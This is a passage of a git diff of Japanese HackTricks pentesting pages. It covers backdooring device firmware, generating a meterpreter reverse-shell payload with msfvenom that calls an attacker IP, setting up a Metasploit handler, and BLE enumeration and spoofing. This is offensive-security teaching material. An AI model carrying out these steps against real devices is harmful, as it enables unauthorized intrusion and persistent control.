|
||||
2. ターゲットのファームウェアアーキテクチャとエンディアンを特定します。
|
||||
3. Buildrootを使用してクロスコンパイラをビルドするか、環境に合わせた他の方法を使用します。
|
||||
4. クロスコンパイラを使用してバックドアをビルドします。
|
||||
5. バックドアを抽出したファームウェアの/usr/binにコピーします。
|
||||
6. 適切なQEMUバイナリを抽出したファームウェアのルートファイルシステムにコピーします。
|
||||
7. chrootとQEMUを使用してバックドアをエミュレートします。
|
||||
8. netcatを使用してバックドアに接続します。
|
||||
9. 抽出したファームウェアのルートファイルシステムからQEMUバイナリを削除します。
|
||||
10. FMKを使用して変更したファームウェアを再パッケージ化します。
|
||||
11. ファームウェア解析ツールキット(FAT)を使用してバックドア付きのファームウェアをエミュレートし、netcatを使用してターゲットのバックドアIPとポートに接続してテストします。
|
||||
1. firmware-mod-kit (FMK)でファームウェアを抽出する
|
||||
2. 対象ファームウェアのアーキテクチャとエンディアンを特定する
|
||||
3. Buildrootを使ってクロスコンパイラをビルドするか、環境に合った他の方法を使用する
|
||||
4. クロスコンパイラを使用してバックドアをビルドする
|
||||
5. バックドアを抽出したファームウェアの/usr/binにコピーする
|
||||
6. 適切なQEMUバイナリを抽出したファームウェアのrootfsにコピーする
|
||||
7. chrootとQEMUを使用してバックドアをエミュレートする
|
||||
8. netcatを使用してバックドアに接続する
|
||||
9. 抽出したファームウェアのrootfsからQEMUバイナリを削除する
|
||||
10. FMKで変更されたファームウェアを再パッケージする
|
||||
11. ファームウェア分析ツールキット(FAT)でバックドア付きファームウェアをエミュレートし、netcatを使用して対象のバックドアIPとポートに接続してテストする
|
||||
|
||||
既にダイナミック解析、ブートローダ操作、またはハードウェアセキュリティテスト手段からルートシェルを取得している場合は、インプラントやリバースシェルなどの事前にコンパイルされた悪意のあるバイナリを実行しようとします。コマンドアンドコントロール(C\&C)フレームワークに使用される自動ペイロード/インプラントツールの使用を検討してください。たとえば、Metasploitフレームワークと「msfvenom」を使用する場合は、次の手順を使用します。
|
||||
動的分析、ブートローダーの操作、またはハードウェアセキュリティテストから既にrootシェルを取得している場合は、インプラントやリバースシェルなどの事前にコンパイルされた悪意のあるバイナリを実行してみてください。コマンドアンドコントロール(C&C)フレームワークに使用される自動ペイロード/インプラントツールの使用を検討してください。例えば、Metasploitフレームワークと「msfvenom」は以下の手順を使用して活用できます。
|
||||
|
||||
1. ターゲットのファームウェアアーキテクチャとエンディアンを特定します。
|
||||
2. `msfvenom`を使用して、適切なターゲットペイロード(-p)、攻撃者のホストIP(LHOST=)、リッスンポート番号(LPORT=)、ファイルタイプ(-f)、アーキテクチャ(--arch)、プラットフォーム(--platform linuxまたはwindows)、および出力ファイル(-o)を指定します。たとえば、`msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux`
|
||||
3. ペイロードを侵害されたデバイスに転送します(たとえば、ローカルウェブサーバーを実行し、ペイロードをファイルシステムにwget/curlします)およびペイロードに実行許可があることを確認します。
|
||||
4. Metasploitを受信リクエストを処理するように準備します。たとえば、msfconsoleでMetasploitを起動し、次の設定を使用します(上記のペイロードに応じて):use exploit/multi/handler、
|
||||
1. 対象ファームウェアのアーキテクチャとエンディアンを特定する
|
||||
2. `msfvenom`を使用して、適切なターゲットペイロード(-p)、攻撃者ホストIP(LHOST=)、リスニングポート番号(LPORT=)、ファイルタイプ(-f)、アーキテクチャ(--arch)、プラットフォーム(--platform linuxまたはwindows)、出力ファイル(-o)を指定する。例えば、`msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux`
|
||||
3. ペイロードを侵害されたデバイスに転送する(例:ローカルWebサーバーを実行し、ペイロードをファイルシステムにwget/curlする)し、ペイロードが実行権限を持っていることを確認する
|
||||
4. Metasploitを準備して、着信リクエストを処理する。例えば、msfconsoleでMetasploitを起動し、上記のペイロードに従って以下の設定を使用する:exploit/multi/handlerを使用する、
|
||||
* `set payload linux/armle/meterpreter_reverse_tcp`
|
||||
* `set LHOST 192.168.1.245 #attacker host IP`
|
||||
* `set LPORT 445 #can be any unused port`
|
||||
* `set LHOST 192.168.1.245 #攻撃者ホストIP`
|
||||
* `set LPORT 445 #未使用のポートであれば何でも良い`
|
||||
* `set ExitOnSession false`
|
||||
* `exploit -j -z`
|
||||
5. 侵害されたデバイスでメータープリタリバース🐚を実行します。
|
||||
6. メータープリターセッションが開かれるのを見守ります。
|
||||
7. ポストエクスプロイト活動を実行します。
|
||||
5. 侵害されたデバイスでmeterpreterリバースシェルを実行する
|
||||
6. meterpreterセッションが開くのを見る
|
||||
7. 侵害後の活動を行う
|
||||
|
||||
可能であれば、起動スクリプト内の脆弱性を特定して、デバイスが再起動しても持続的なアクセスを取得します。このような脆弱性は、起動スクリプトがSDカードやルートファイルシステム以外の信頼されていないマウントされた場所にあるコードを参照、[シンボリックリンク](https://www.chromium.org/chromium-os/chromiumos-design-docs/hardening-against-malicious-stateful-data)、または依存する場合に発生します。、ストレージデータ用のフラッシュボリュームなど。
|
||||
可能であれば、起動スクリプト内の脆弱性を特定し、再起動をまたいでデバイスへの永続的なアクセスを取得します。このような脆弱性は、起動スクリプトが、SDカードやルートファイルシステム外のデータストレージに使用されるフラッシュボリュームなど、信頼できないマウントされた場所にあるコードを参照、[シンボリックリンク](https://www.chromium.org/chromium-os/chromiumos-design-docs/hardening-against-malicious-stateful-data)、または依存している場合に発生します。
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
|
||||
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,34 +1,13 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksであなたの会社を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,27 +1,25 @@
|
|||
# Low-Power Wide Area Network
|
||||
# 低電力広域ネットワーク
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、PRを[HackTricksリポジトリ](https://github.com/carlospolop/hacktricks)と[HackTricks Cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**に提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
## はじめに
|
||||
|
||||
**Low-Power Wide Area Network**(LPWAN)は、低ビットレートでの**長距離通信**を目的としたワイヤレス、低消費電力、広域ネットワーク技術のグループです。\
|
||||
これらは**6マイル以上**到達し、**20年間**のバッテリ寿命を持つことができます。
|
||||
**低電力広域ネットワーク**(LPWAN)は、低ビットレートでの**長距離通信**を目的とした無線、低電力、広域ネットワーク技術のグループです。\
|
||||
**6マイル以上**に達し、その**バッテリー**は最大**20年**持続することができます。
|
||||
|
||||
Long Range(**LoRa**)は、複数の国で人気があり、**LoRaWAN**というオープンソースの仕様があります。
|
||||
Long Range(**LoRa**)は複数の国で人気があり、**LoRaWAN**と呼ばれるオープンソースの仕様があります。
|
||||
|
||||
### LPWAN、LoRa、およびLoRaWAN
|
||||
|
||||
|
@ -29,16 +27,14 @@ Long Range(**LoRa**)は、複数の国で人気があり、**LoRaWAN**とい
|
|||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,37 +1,35 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# はじめに
|
||||
|
||||
Bluetooth 4.0の仕様から利用可能なBLEは、2400〜2483.5 MHzの範囲で40チャンネルのみを使用します。一方、従来のBluetoothは同じ範囲で79チャンネルを使用します。
|
||||
Bluetooth 4.0仕様から利用可能なBLEは、2400から2483.5 MHzの範囲をカバーする40チャンネルのみを使用します。これに対し、従来のBluetoothは同じ範囲で79チャンネルを使用します。
|
||||
|
||||
BLEデバイスは、**広告パケット**(**ビーコン**)を送信することで、他の近くのデバイスにBLEデバイスの存在を伝えます。これらのビーコンは、時には**データを送信**することもあります。
|
||||
BLEデバイスが通信する方法は、**アドバタイジングパケット**(**ビーコン**)を送信することです。これらのパケットは、BLEデバイスの存在を近くの他のデバイスにブロードキャストします。これらのビーコンは時々**データを送信**します。
|
||||
|
||||
リスニングデバイス(またはセントラルデバイス)は、広告パケットに対して**スキャンリクエスト**を送信することで、広告デバイスに特定のスキャンを行うことができます。そのスキャンへの**応答**は、初期の広告リクエストに収まらなかった追加情報を含む、同じ構造の**広告**パケットを使用します。追加情報には、デバイスの完全なデバイス名などが含まれます。
|
||||
リスニングデバイス、またはセントラルデバイスとも呼ばれるデバイスは、アドバタイジングデバイスに特定して送られる**SCANリクエスト**でアドバタイジングパケットに応答することができます。そのスキャンへの**レスポンス**は、初期のアドバタイジングリクエストに収まらなかった追加情報、例えば完全なデバイス名などを含む、**アドバタイジング**パケットと同じ構造を使用します。
|
||||
|
||||
![](<../.gitbook/assets/image (201) (2) (1) (1).png>)
|
||||
|
||||
プリアンブルバイトは周波数を同期させ、4バイトのアクセスアドレスは複数のデバイスが同じチャンネルで接続を確立しようとするシナリオで使用される**接続識別子**です。次に、プロトコルデータユニット(**PDU**)には**広告データ**が含まれます。いくつかの種類のPDUがありますが、最も一般的に使用されるのはADV\_NONCONN\_INDとADV\_INDです。デバイスは、**接続を受け入れない**場合は**ADV\_NONCONN\_IND** PDUタイプを使用し、データを広告パケットのみで送信します。デバイスは、**接続を許可**し、**接続**が**確立**されると**広告**パケットの送信を停止する場合は**ADV\_IND**を使用します。
|
||||
プリアンブルバイトは周波数を同期させ、4バイトのアクセスアドレスは**接続識別子**であり、複数のデバイスが同じチャンネル上で接続を確立しようとしているシナリオで使用されます。次に、プロトコルデータユニット(**PDU**)には**アドバタイジングデータ**が含まれます。PDUにはいくつかのタイプがありますが、最も一般的に使用されるのはADV\_NONCONN\_INDとADV\_INDです。デバイスは、接続を**受け付けない**場合に**ADV\_NONCONN\_IND** PDUタイプを使用し、アドバタイジングパケット内のみでデータを送信します。デバイスは、接続を**許可する**場合に**ADV\_IND**を使用し、**接続が確立されるとアドバタイジングパケットの送信を停止**します。
|
||||
|
||||
## GATT
|
||||
|
||||
**Generic Attribute Profile**(GATT)は、**デバイスがデータをどのようにフォーマットし、転送するか**を定義します。BLEデバイスの攻撃対象を分析する際には、GATT(またはGATTs)に注目することが多いです。なぜなら、デバイスの機能がトリガーされ、データが格納、グループ化、変更される方法がGATTによって決まるからです。GATTは、デバイスの特性、ディスクリプタ、およびサービスを16ビットまたは32ビットの値として表すテーブルとしてリストアップされます。**特性**は、セントラルデバイスとペリフェラル間で**送信**される**データ値**です。これらの特性には、**それに関する追加情報を提供するディスクリプタ**があります。**特性**は、特定のアクションを実行するために関連している場合、**サービス**に**グループ化**されることがよくあります。
|
||||
**Generic Attribute Profile**(GATT)は、**デバイスがデータをどのようにフォーマットして転送するか**を定義します。BLEデバイスの攻撃面を分析するとき、しばしばGATT(またはGATTs)に注目します。なぜなら、それが**デバイス機能がトリガーされる方法**であり、データがどのように保存、グループ化、変更されるかを決定するからです。GATTは、デバイスの特性、記述子、およびサービスを16ビットまたは32ビットの値として表にリストします。**特性**は、セントラルデバイスとペリフェラル間で**送信されるデータ**値です。これらの特性には、それらについて**追加情報を提供する記述子**があります。**特性**は、特定のアクションを実行するために関連している場合、しばしば**サービス**内で**グループ化**されます。
|
||||
|
||||
# 列挙化
|
||||
# 列挙
|
||||
```bash
|
||||
hciconfig #Check config, check if UP or DOWN
|
||||
# If DOWN try:
|
||||
|
@ -43,8 +41,8 @@ spooftooph -i hci0 -a 11:22:33:44:55:66
|
|||
```
|
||||
## GATTool
|
||||
|
||||
**GATTool**は、他のデバイスとの**接続**を**確立**し、そのデバイスの**特性**をリストし、属性の読み書きを行うことができます。\
|
||||
GATTToolは、`-I`オプションを使用して対話型シェルを起動することができます。
|
||||
**GATTool** は他のデバイスとの**接続**を**確立**し、そのデバイスの**特性**をリストし、属性を読み取り書き込むことができます。\
|
||||
GATTToolは `-I` オプションでインタラクティブシェルを起動できます:
|
||||
```bash
|
||||
gatttool -i hci0 -I
|
||||
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
|
||||
|
@ -66,14 +64,6 @@ gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read
|
|||
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
|
||||
```
|
||||
## Bettercap
|
||||
|
||||
Bettercapは、Bluetooth Low Energy(BLE)デバイスのペネトレーションテストに使用される強力なツールです。このツールは、BLEデバイスのスキャン、スニッフィング、スプーフィング、およびMITM(Man-in-the-Middle)攻撃など、さまざまな攻撃手法をサポートしています。
|
||||
|
||||
Bettercapを使用すると、BLEデバイスのセキュリティに関する脆弱性を特定し、悪用することができます。例えば、デバイスのMACアドレスをスプーフィングして、デバイスとの通信を傍受したり、改ざんしたりすることができます。
|
||||
|
||||
Bettercapは、コマンドラインインターフェース(CLI)を提供しており、シンプルで使いやすい操作性を備えています。さらに、プラグインシステムを使用して、機能を拡張することもできます。
|
||||
|
||||
Bettercapは、BLEデバイスのセキュリティ評価やペネトレーションテストにおいて、非常に有用なツールです。その強力な機能と柔軟性により、セキュリティ専門家やハッカーは、BLEデバイスの脆弱性を特定し、適切な対策を講じることができます。
|
||||
```bash
|
||||
# Start listening for beacons
|
||||
sudo bettercap --eval "ble.recon on"
|
||||
|
@ -87,16 +77,14 @@ sudo bettercap --eval "ble.recon on"
|
|||
```
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,28 +1,27 @@
|
|||
<details>
|
||||
|
||||
